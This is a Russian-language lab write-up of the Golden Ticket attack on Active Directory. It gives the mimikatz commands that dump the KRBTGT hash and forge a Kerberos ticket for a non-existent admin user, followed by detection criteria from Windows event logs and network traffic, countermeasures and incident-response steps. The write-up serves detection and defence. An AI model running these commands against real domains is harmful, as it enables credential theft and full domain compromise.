Атака «Golden Tickets» — это атака на Active Directory после компрометации, при которой скомпрометированная учетная запись, такая как администратор домена или учетная запись с правами DCSync, может сбросить хэш учетной записи KRBTGT и создать золотой билет, который эффективно дает злоумышленнику возможность доступа к любому ресурсу в домене. Каждый раз, когда злоумышленник хочет получить доступ к ресурсу, он может подделать билет для этого ресурса.
| Объект атаки | Active Directory |
| Приложения | mimikatz |
| Тактика ATT&CK | Credential Access |
| Техника ATT&CK | T1558.001 |
| Виртуальные машины | Windows 10 (192.168.56.111) Windows Server 2019 (192.168.56.113) |
| Учетные записи | usertest — пользователь без административных привилегий adadmin — администратор домена Administrator — администратор домена |
| Настройки журналирования | Расширенные настройки аудита windows Sysmon Wireshark |
Данная статья носит исключительно ознакомительный характер и не является руководством к действию.
Этапы атаки
Получение хэш пароля от KRBTGT
Запуск выполняется на контроле домена под пользователем — adadmin.
#Windows mimikatz- входим в режим debug
mimikatz.exe Privilege::debug
#Windows mimikatz- получаем: SID и NTLM
Lsadump::lsa /Inject /name:krbtgt
Формирование поддельного билета
#Windows mimikatz - Создаем несуществующего пользователя newAdmin
Kerberos::golden /user:newAdmin /domain:home.local /sid:S-1-5-21-2509495909-1219801760-1757532611 /krbtgt:541a4e913204b00af2dba01b8e91ad7a /id:500 /ptt
#PowerShell - проверяем командой klist, что билет для пользователя newAdmin создан
klist
#Windows mimikatz - запускаем команду misc::cmd, чтобы запустить cmd в контексте созданного билета и выполняем успешное подключение к контролеру домена
misc::cmd
Обнаружение
| Коммуникация | Источник | Команда | Место | Информация |
|---|---|---|---|---|
| Windows 10 (192.168.56.111) -> Windows Server 2019 (192.168.56.113) | Destination host Windows Server 2019 (192.168.56.113) | dir \WIN-KJOFE29AB0E\c$ | Event log — Security | Event ID: 4624 Impersonation Level: Delegation Security ID: HOME\Administrator Account Name: newAdmin Account Domain: home.local |
| Event ID: 4672 Security ID: HOME\Administrator Account Name: newAdmin | ||||
| Event ID: 4769 Account Name: newAdmin@home.local Account Domain: home.local |
Критерии для правил корреляции
Атака Golden Ticket сложна в обнаружении автоматизированными средствами, необходимо выполнить аналитику нескольких косвенных признаков, которые могут быть легитимными.
Событие Event ID 4624:
Не совпадает Security ID и Account Name, поле Impersonation Level: Delegation. Поле Account Domain написано маленькими буквами.
Событие Event ID 4672:
Не совпадает Security ID и Account Name.
Событие Event ID 4769:
Имя домена в полях Account Name и Account Domain написано маленькими буквами.
Событие Event ID 4768:
Данное событие при реализации доступа под поддельным билетом отсутствует.
Проверка срока жизни выпущенного билета:
Срок жизни билета превышает максимальное значение для домена (по умолчанию срок действия составляет 10 часов, но, например, mimikatz выпускает на 10 лет).
Событие Event ID 4627:
Проверка изменений в группах (добавлено или удалено).
Сетевой трафик:
Отсутствие TGT запроса, так как злоумышленник формирует билет самостоятельно на собственной локальной машине, поэтому сразу запрашивает TGS.
Противодействие
- Выполнять сброс учетной записи krbtgt(дважды) минимум раз в полгода
- Внести в имя учетной записи администратора домена критерий фильтрации (например, писать Administrator с большой буквы)
- Создать терминальный сервер, который подключается исключительно только к контролеру домена. Настроить контроле домена, так чтобы он принимал административные подключения только от этого терминального сервера
- Проверка имен пользователей, которые отсутствуют в Active Directory
Реагирование
Ответные меры на атаку «Golden Tickets» очень трудно реализовывать в рабочей инфраструктуре. Основная стратегия заключается в следующем:
- Активируйте процесс реагирования на инциденты и предупредите группу реагирования на инциденты
- Поместите в карантин любые затронутые компьютеры (например, хост, запросивший билет на обслуживание) для проведения анализа, устранения и восстановления
- Заменить пароль для администраторов домена
- Заменить пароль для учетной записи krbtgt
Однако могут потребоваться недели планирования и усилий, чтобы не только полностью уничтожить механизмы присутствия злоумышленников, но и внести изменения, необходимые для обеспечения того, чтобы они не могли повторно использовать предыдущий путь атаки для восстановления доступа.
Источники:
https://adsecurity.org/?p=1515
Файлы логов:
- GoldenTickets.evtx — события Windows Server 2019 (192.168.56.113)
- GT.pcapng — сетевой трафик Windows Server 2019 (192.168.56.113)
События:
- 05.05.2023 в 16:06:06 запрос билета TGT для пользователя usertest
- 05.05.2023 в 16:06:37 запрос билета TGS для пользователя newAdmin
